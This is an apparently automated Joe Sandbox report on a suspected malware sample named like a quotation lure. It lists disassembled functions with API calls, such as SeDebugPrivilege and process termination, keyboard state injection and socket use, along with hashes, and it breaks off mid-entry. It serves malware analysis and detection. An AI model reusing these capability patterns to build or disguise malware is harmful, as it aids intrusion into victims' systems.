                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                      • String ID: SeDebugPrivilege
                                                                                      • API String ID: 2533919879-2896544425
                                                                                      • Opcode ID: cb38db089c160fd5f465efa91450190b289bbdeee04e239c8942e7f7648d5476
                                                                                      • Instruction ID: 1991ec38b69463bdb303b94b8df2ed44868bb0e79c72d88fbd54574294b1d95a
                                                                                      • Opcode Fuzzy Hash: cb38db089c160fd5f465efa91450190b289bbdeee04e239c8942e7f7648d5476
                                                                                      • Instruction Fuzzy Hash: EF61A1302442429FD720DF14C494F5ABBE1AF54318F55849CE45A4FBA3C7B2ED46DB92
                                                                                      Function 0012BC5E Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0012BCFD
                                                                                      • IsMenu.USER32(00000000), ref: 0012BD1D
                                                                                      • CreatePopupMenu.USER32 ref: 0012BD53
                                                                                      • GetMenuItemCount.USER32(00A898B8), ref: 0012BDA4
                                                                                      • InsertMenuItemW.USER32(00A898B8,?,00000001,00000030), ref: 0012BDCC
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                      • String ID: 0$2
                                                                                      • API String ID: 93392585-3793063076
                                                                                      • Opcode ID: 5d756c6dc87960146e066497a85d9ef1b239bf75c9ecfb182502c871ed741ec9
                                                                                      • Instruction ID: 358162839800437becc528399c11af99555505faf420b107be65c636df597a3c
                                                                                      • Opcode Fuzzy Hash: 5d756c6dc87960146e066497a85d9ef1b239bf75c9ecfb182502c871ed741ec9
                                                                                      • Instruction Fuzzy Hash: 6751BE70A08329DBDB14CFE8E8C4BEEBBF4AF55318F148119E4519B291E7709961CB91
                                                                                      Function 0012C874 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • LoadIconW.USER32(00000000,00007F03), ref: 0012C913
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: IconLoad
                                                                                      • String ID: blank$info$question$stop$warning
                                                                                      • API String ID: 2457776203-404129466
                                                                                      • Opcode ID: 8538c6b751da78a53ab26b6986da8a43e8126dd480e837a77e403de60b234f5b
                                                                                      • Instruction ID: 778f995ddd844a5860f66f27ba50125c1bda71767bbf062825a6b27a47645c7d
                                                                                      • Opcode Fuzzy Hash: 8538c6b751da78a53ab26b6986da8a43e8126dd480e837a77e403de60b234f5b
                                                                                      • Instruction Fuzzy Hash: C2112B31689316BEEB046B54EC83CEE379CDF15328B10003EF700A6182E7E05E5057E9
                                                                                      Function 00159F86 Relevance: 12.3, APIs: 8, Instructions: 260windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 000D9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 000D9BB2
                                                                                      • GetSystemMetrics.USER32(0000000F), ref: 00159FC7
                                                                                      • GetSystemMetrics.USER32(0000000F), ref: 00159FE7
                                                                                      • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0015A224
                                                                                      • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0015A242
                                                                                      • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0015A263
                                                                                      • ShowWindow.USER32(00000003,00000000), ref: 0015A282
                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 0015A2A7
                                                                                      • DefDlgProcW.USER32(?,00000005,?,?), ref: 0015A2CA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                                      • String ID:
                                                                                      • API String ID: 1211466189-0
                                                                                      • Opcode ID: 8993da2a4a8f90d757042bf1ae5c32c575604b73d5b086cb06960c1ed53ad50b
                                                                                      • Instruction ID: 637c69a3dfb25ca08ca48080eb6e50d06af7ce28b39e136525cd768b43203a01
                                                                                      • Opcode Fuzzy Hash: 8993da2a4a8f90d757042bf1ae5c32c575604b73d5b086cb06960c1ed53ad50b
                                                                                      • Instruction Fuzzy Hash: 15B1B931640219EFCF14CF68C9C57AA3BB2BF48702F488169ECA59F295D731A984CB51
                                                                                      Function 000DF8D8 Relevance: 12.1, APIs: 8, Instructions: 124COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0011682C,00000004,00000000,00000000), ref: 000DF953
                                                                                      • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,0011682C,00000004,00000000,00000000), ref: 0011F3D1
                                                                                      • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0011682C,00000004,00000000,00000000), ref: 0011F454
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: ShowWindow
                                                                                      • String ID:
                                                                                      • API String ID: 1268545403-0
                                                                                      • Opcode ID: b799a95c609f48f6772fb42368679f9a777a42b9a793b1cff0db28c97ff0908f
                                                                                      • Instruction ID: 93c2a7e17507d82b741b8280daab1e168e4b731a529cda5cafac9e8a7e8d58e1
                                                                                      • Opcode Fuzzy Hash: b799a95c609f48f6772fb42368679f9a777a42b9a793b1cff0db28c97ff0908f
                                                                                      • Instruction Fuzzy Hash: BB410830A18782BEC7799F2988A877ABAD2BB56314F14C03EE05796B61D73198C1C771
                                                                                      Function 00152D03 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • DeleteObject.GDI32(00000000), ref: 00152D1B
                                                                                      • GetDC.USER32(00000000), ref: 00152D23
                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00152D2E
                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 00152D3A
                                                                                      • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00152D76
                                                                                      • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00152D87
                                                                                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00155A65,?,?,000000FF,00000000,?,000000FF,?), ref: 00152DC2
                                                                                      • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00152DE1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                      • String ID:
                                                                                      • API String ID: 3864802216-0
                                                                                      • Opcode ID: 5f648900b2d9542f8eb0846feadb6ffa097d7874e65c8ac19d021933f44189f2
                                                                                      • Instruction ID: 13a4eb7a97b2d39ffd6d2766b3332759e6cca400fe7f9219a6cc118c5c7b05bc
                                                                                      • Opcode Fuzzy Hash: 5f648900b2d9542f8eb0846feadb6ffa097d7874e65c8ac19d021933f44189f2
                                                                                      • Instruction Fuzzy Hash: BA316B76201314BFEB118F50DC8AFEB3BA9EB0A716F044055FE089E291C6759C90CBA4
                                                                                      Function 00144FAE Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: NULL Pointer assignment$Not an Object type
                                                                                      • API String ID: 0-572801152
                                                                                      • Opcode ID: da742ad1442b8089a4c472cca2722d6346b3e71ff685ea2e53ac99a4f2a75326
                                                                                      • Instruction ID: 161d618f11385ace130256a57af93d08e949ca7e86c034dfb39ef538a4240264
                                                                                      • Opcode Fuzzy Hash: da742ad1442b8089a4c472cca2722d6346b3e71ff685ea2e53ac99a4f2a75326
                                                                                      • Instruction Fuzzy Hash: 7CD1B175A0060AAFDF14CFA8C881FAEB7B6BF48344F148169F915AB292D770DD45CB90
                                                                                      Function 00144523 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Variant$ClearInit
                                                                                      • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                      • API String ID: 2610073882-625585964
                                                                                      • Opcode ID: 3f382e0d12a9b87dfd61663f5cd0d3d82f5034f0f664c5e957c01bb596041c31
                                                                                      • Instruction ID: ec64ac9a27f8e10f4ca013c4686039c73c99d06a22362a9447157b3e7a5b21ed
                                                                                      • Opcode Fuzzy Hash: 3f382e0d12a9b87dfd61663f5cd0d3d82f5034f0f664c5e957c01bb596041c31
                                                                                      • Instruction Fuzzy Hash: 9C91AC71A00219EFDF24CFA4C888FAEBBB8EF46715F108559F515AB291D7709942CFA0
                                                                                      Function 00131187 Relevance: 10.8, APIs: 7, Instructions: 254COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 0013125C
                                                                                      • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00131284
                                                                                      • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 001312A8
                                                                                      • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 001312D8
                                                                                      • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 0013135F
                                                                                      • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 001313C4
                                                                                      • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00131430
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                                      • String ID:
                                                                                      • API String ID: 2550207440-0
                                                                                      • Opcode ID: 14a43b911742060f004119efc2b5f71a59fac6f946cf223c4cbfade05f84d617
                                                                                      • Instruction ID: 6a86d7165b7cd48fc157f423cb8ae9082e80987363798c1e62f61fbfdbe9b6fc
                                                                                      • Opcode Fuzzy Hash: 14a43b911742060f004119efc2b5f71a59fac6f946cf223c4cbfade05f84d617
                                                                                      • Instruction Fuzzy Hash: 8991F472A00309AFEB00DFA4C894BFEB7B5FF44325F214029E911EB292D774A941CB90
                                                                                      Function 000D948A Relevance: 10.8, APIs: 7, Instructions: 254COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: ObjectSelect$BeginCreatePath
                                                                                      • String ID:
                                                                                      • API String ID: 3225163088-0
                                                                                      • Opcode ID: 58c9497992c06d74d0e1b9618d40dd3a3376b85374c1c8acdd62b8e597798724
                                                                                      • Instruction ID: a0a61dfe4b63d4b5cff9ce9aed77343e10b9d2119dc72a63d0b34f243fd8ffac
                                                                                      • Opcode Fuzzy Hash: 58c9497992c06d74d0e1b9618d40dd3a3376b85374c1c8acdd62b8e597798724
                                                                                      • Instruction Fuzzy Hash: A9911571900219EFCB15CFA9C884AEEBBB8FF49320F144556E515B7295D374AA82CBA0
                                                                                      Function 00157E9E Relevance: 10.7, APIs: 7, Instructions: 193windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • IsWindow.USER32(00A89908), ref: 00157F37
                                                                                      • IsWindowEnabled.USER32(00A89908), ref: 00157F43
                                                                                      • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0015801E
                                                                                      • SendMessageW.USER32(00A89908,000000B0,?,?), ref: 00158051
                                                                                      • IsDlgButtonChecked.USER32(?,?), ref: 00158089
                                                                                      • GetWindowLongW.USER32(00A89908,000000EC), ref: 001580AB
                                                                                      • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 001580C3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                      • String ID:
                                                                                      • API String ID: 4072528602-0
                                                                                      • Opcode ID: e53bc1c8cb7f769d0be4e42132c1565f2a2bfcbca801c2d996879b04ccea881e
                                                                                      • Instruction ID: b8aee364c35e89f2ae94ea237e0ef80fcf8f08cd9c715499b7eeec704f03b503
                                                                                      • Opcode Fuzzy Hash: e53bc1c8cb7f769d0be4e42132c1565f2a2bfcbca801c2d996879b04ccea881e
                                                                                      • Instruction Fuzzy Hash: C7718D34608204EFEB21DF54D886FEA7BB5EF09302F14045AFD759B2A1CB31A988CB50
                                                                                      Function 0012AEBA Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetParent.USER32(?), ref: 0012AEF9
                                                                                      • GetKeyboardState.USER32(?), ref: 0012AF0E
                                                                                      • SetKeyboardState.USER32(?), ref: 0012AF6F
                                                                                      • PostMessageW.USER32(?,00000101,00000010,?), ref: 0012AF9D
                                                                                      • PostMessageW.USER32(?,00000101,00000011,?), ref: 0012AFBC
                                                                                      • PostMessageW.USER32(?,00000101,00000012,?), ref: 0012AFFD
                                                                                      • PostMessageW.USER32(?,00000101,0000005B,?), ref: 0012B020
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessagePost$KeyboardState$Parent
                                                                                      • String ID:
                                                                                      • API String ID: 87235514-0
                                                                                      • Opcode ID: 044b760c130b1c9da1712c7539e926b8e23d7212e9389633e10eba8a27f3057f
                                                                                      • Instruction ID: 668bd037bc214fadaef956dffbe724aedf795881648c6070fc9e3d064966e660
                                                                                      • Opcode Fuzzy Hash: 044b760c130b1c9da1712c7539e926b8e23d7212e9389633e10eba8a27f3057f
                                                                                      • Instruction Fuzzy Hash: B851D3A06087E53EFB3742349D45BBABFE95F06304F088589F2E9958C2D398ACE4D751
                                                                                      Function 0012ACDA Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetParent.USER32(00000000), ref: 0012AD19
                                                                                      • GetKeyboardState.USER32(?), ref: 0012AD2E
                                                                                      • SetKeyboardState.USER32(?), ref: 0012AD8F
                                                                                      • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 0012ADBB
                                                                                      • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 0012ADD8
                                                                                      • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 0012AE17
                                                                                      • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 0012AE38
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessagePost$KeyboardState$Parent
                                                                                      • String ID:
                                                                                      • API String ID: 87235514-0
                                                                                      • Opcode ID: 5d41d95becc887495fd85e120e48dfae792844b4aefc9e47c6b9e7a1bb461574
                                                                                      • Instruction ID: 2690a2b1d71472dd989c9426b568d13c8089910add7ab7ee1289065eb8ffeb28
                                                                                      • Opcode Fuzzy Hash: 5d41d95becc887495fd85e120e48dfae792844b4aefc9e47c6b9e7a1bb461574
                                                                                      • Instruction Fuzzy Hash: 865116A05087E53EFB3683749C95B7ABEA85F05300F488488E1D5468C3D394ECA4D352
                                                                                      Function 00153886 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 141windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00153925
                                                                                      • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 0015393A
                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00153954
                                                                                      • SendMessageW.USER32(?,00001057,00000000,?), ref: 001539C6
                                                                                      • SendMessageW.USER32(?,00001061,?,0000000F), ref: 001539F4
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Window
                                                                                      • String ID: SysListView32
                                                                                      • API String ID: 2326795674-78025650
                                                                                      • Opcode ID: 0d2d96f27d0f82b0ef350d357f893c2f1667ff1ac025cef0f65e3cac37043045
                                                                                      • Instruction ID: 3a6734ca8262f1d2ed308ce464a18402a90e447581a6f4bbd291f97a8967ccf7
                                                                                      • Opcode Fuzzy Hash: 0d2d96f27d0f82b0ef350d357f893c2f1667ff1ac025cef0f65e3cac37043045
                                                                                      • Instruction Fuzzy Hash: 9E417571A00319EFEF259F64CC49BEA77A9EF08395F100526F964EB281D7719A84CB90
                                                                                      Function 001410B8 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 0014304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0014307A
                                                                                      • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00141112
                                                                                      • WSAGetLastError.WSOCK32 ref: 00141121
                                                                                      • WSAGetLastError.WSOCK32 ref: 001411C9
                                                                                      • closesocket.WSOCK32(00000000), ref: 001411F9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$closesocketinet_addrsocket
                                                                                      • String ID:
                                                                                      • API String ID: 3854663608-0
                                                                                      • Opcode ID: 5eb964c868e7ef4b44d24d99f227c9f7ccecbd4d4730c02141b6f6391b0d1d44
                                                                                      • Instruction ID: 6c596987b9b1539883a633ba33ec0d8346ffacdf1924ff8921597c5026ee1ae4
